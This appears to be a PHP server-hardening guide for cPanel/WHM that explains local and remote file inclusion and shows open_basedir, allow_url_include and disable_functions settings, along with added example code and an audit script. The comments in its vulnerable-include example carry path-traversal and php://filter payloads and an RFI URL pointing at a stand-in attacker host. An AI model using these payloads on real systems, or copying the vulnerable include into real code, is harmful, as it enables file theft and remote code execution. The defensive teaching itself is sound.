Web applications written in PHP can contain loopholes that external attackers exploit. Your server might be exposed to the vulnerabilities listed below.
You can improve the security of your server's PHP configuration using the options described below.
Web applications that include scripts and files often contain a file-inclusion vulnerability, which attackers use to gain access to your system. Some applications do not validate the arguments of their require and include statements, or accept filenames as request parameters. A file on the server may then be replaced by a rogue file of the same name, or the include path may be pointed at a file the developer never intended to load. There are two types of file-inclusion attack: Remote File Inclusion (RFI) and Local File Inclusion (LFI).
In a Local File Inclusion attack, the attacker makes a PHP script read or execute files that already exist on the server, revealing restricted information such as configuration files, credentials, or other users' source code.
You can use the open_basedir directive to limit the damage a local file inclusion vulnerability can do. The option can be found in WHM's PHP open_basedir Tweak interface at WHM > Home > Security Center > PHP open_basedir Tweak. open_basedir confines PHP's file operations to the listed directory trees, so an included path that resolves outside them (for example /etc/passwd) is refused. It does not fix the vulnerable code itself, and it is no substitute for validating the filename in the application.
Files on your server can also be reached from a remote location. An attacker might upload a PHP script to your server, or host one on a system they control, and then use the inclusion loophole to load it with a Remote File Inclusion. Through the faulty PHP settings the attacker runs their own code on your server and can read and write files with the web server's permissions.
To avoid such exploits, deactivate the allow_url_include and allow_url_fopen options. They are available under the Advanced Mode section of WHM's PHP Security Concepts interface, at WHM > Home > Service Configuration > PHP Configuration Editor. allow_url_include is Off by default and should stay that way. allow_url_fopen is On by default, and turning it off also stops functions such as fopen() and file_get_contents() from fetching URLs, so check whether any of your applications depend on that before disabling it (code that uses the cURL extension is unaffected).
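The following is an added example, not code from the original page or from cPanel/WHM. It shows the vulnerable include pattern behind both the LFI and RFI attacks described above, and a hardened form that maps the request parameter to a fixed allowlist instead of a path, with open_basedir and allow_url_include as defence in depth. The parameter name page, the pages/ directory and the allowlist entries are illustrative assumptions.

```php
<?php
// Added example (not from the original page or from cPanel/WHM): a
// file-inclusion flaw and its hardened form. $page, pages/ and the
// allowlist below are illustrative assumptions.

// --- Vulnerable: the filename comes straight from the request -----------
// LFI: ?page=../../../../etc/passwd%00 (or without the null byte on
//      modern PHP, against a script that does not append a suffix)
// LFI: ?page=php://filter/convert.base64-encode/resource=config
//      leaks source code through a stream wrapper, no remote URL needed.
// RFI: with allow_url_include=On, ?page=http://attacker.example/shell
//      fetches and executes attacker-controlled code.
function render_vulnerable(string $page): void
{
    include 'pages/' . $page . '.php';
}

// --- Hardened: map user input to an allowlist, never to a path ----------
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

function resolve_page(string $page): ?string
{
    // Exact-match lookup: "../", "http://", "php://" and friends can never
    // reach include(), because the input is only used as an array key.
    return PAGES[$page] ?? null;
}

function render_hardened(string $page): void
{
    $file = resolve_page($page);
    if ($file === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $file;
}

// Defence in depth, configured in php.ini or per virtual host rather than
// in the script (open_basedir and allow_url_include cannot be relaxed by
// attacker-controlled code at runtime):
//   open_basedir      = /home/example/public_html:/tmp
//   allow_url_include = Off
// open_basedir refuses any file operation that resolves outside the listed
// trees, which blunts the LFI payloads above even if the vulnerable include
// survives; allow_url_include=Off blocks the RFI variant outright.

// For code that genuinely must build a path from input, confine it with
// realpath() and a prefix check, the same idea open_basedir applies globally:
function safe_path(string $baseDir, string $userPath): ?string
{
    $base = realpath($baseDir);
    $real = realpath($baseDir . '/' . $userPath);
    if ($base === false || $real === false) {
        return null;                          // missing file or bad base
    }
    // realpath() resolves symlinks too, so a link pointing outside the base
    // is rejected just like a "../" traversal.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;                          // escaped the base directory
    }
    return $real;
}

render_hardened($_GET['page'] ?? 'home');
```

The allowlist version is the real fix; open_basedir and allow_url_include=Off only limit what a remaining flaw can reach. safe_path() is for the rarer case where a user-supplied relative path is unavoidable, and it should still be paired with an open_basedir that covers only the directory it serves from.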
It is recommended that you deactivate PHP functions that your developers do not use. In a production environment they are dangerous: an attacker who gains code execution through a vulnerable script can call them to run shell commands or otherwise break out of the application.
Enter the functions that you want to deactivate into the disable_functions text box as a comma-separated list (for example exec,passthru,shell_exec,system,proc_open,popen). It is available under the Advanced Mode section of WHM's PHP Security Concepts interface. disable_functions can only be set in the server's PHP configuration, not from a script with ini_set(), which is what makes it effective against attacker-controlled code; check your applications after changing it, since any legitimate use of a disabled function will fail.
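The following is an added example, not code from the original page or from cPanel/WHM. It is a read-only audit script that checks the four settings discussed on this page (open_basedir, allow_url_include, allow_url_fopen and disable_functions) as PHP actually sees them, so you can confirm that a change made in WHM took effect. The list of functions it treats as dangerous is an illustrative assumption; trim it to whatever your applications really do not need.

```php
<?php
// Added example, not from the original page or cPanel/WHM: audit the PHP
// hardening settings discussed above. Run it with the same SAPI the web
// server uses (drop it under a vhost, or run `php audit.php` and remember
// that CLI and web SAPIs can load different ini files).
// The DANGEROUS_FUNCTIONS list is an illustrative assumption.

// Expected php.ini (or per-vhost) values, for reference:
//   allow_url_include = Off
//   allow_url_fopen   = Off
//   open_basedir      = /home/example/public_html:/tmp
//   disable_functions = exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec,pcntl_fork,dl,putenv

const DANGEROUS_FUNCTIONS = [
    'exec', 'passthru', 'shell_exec', 'system', 'proc_open', 'popen',
    'pcntl_exec', 'pcntl_fork', 'dl', 'putenv',
];

// ini_get() returns the directive as written ("1", "On", "true", ...),
// so normalise before comparing.
function ini_bool(string $directive): bool
{
    return filter_var((string) ini_get($directive), FILTER_VALIDATE_BOOLEAN);
}

/** Return a list of human-readable findings; an empty list means all checks passed. */
function audit_php_hardening(): array
{
    $findings = [];

    if (ini_bool('allow_url_include')) {
        $findings[] = 'allow_url_include is On: include/require accept remote URLs (RFI).';
    }
    if (ini_bool('allow_url_fopen')) {
        $findings[] = 'allow_url_fopen is On: fopen()/file_get_contents() accept remote URLs.';
    }
    if ((string) ini_get('open_basedir') === '') {
        $findings[] = 'open_basedir is unset: PHP file operations are not confined to a directory tree.';
    }

    // function_exists() returns false both for functions listed in
    // disable_functions and for functions compiled out (e.g. no pcntl
    // extension), so a true result means the function is really callable.
    foreach (DANGEROUS_FUNCTIONS as $fn) {
        if (function_exists($fn)) {
            $findings[] = "$fn() is callable: add it to disable_functions if your applications do not need it.";
        }
    }

    return $findings;
}

$findings = audit_php_hardening();
if ($findings === []) {
    echo "All PHP hardening checks passed\n";
    exit(0);
}
foreach ($findings as $finding) {
    echo "WARNING: $finding\n";
}
exit(1);
```

The script exits non-zero when anything is still open, so it can be run from a cron job or deployment pipeline as a regression check after PHP upgrades, which sometimes ship a fresh php.ini with the defaults restored.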
Make sure your server is protected by tweaking these PHP settings. The vulnerabilities above can be mitigated with the options available in WHM's Advanced Mode; after changing them, confirm the running values with phpinfo() or ini_get() from a script served by the web server, since the command-line PHP can read a different configuration file.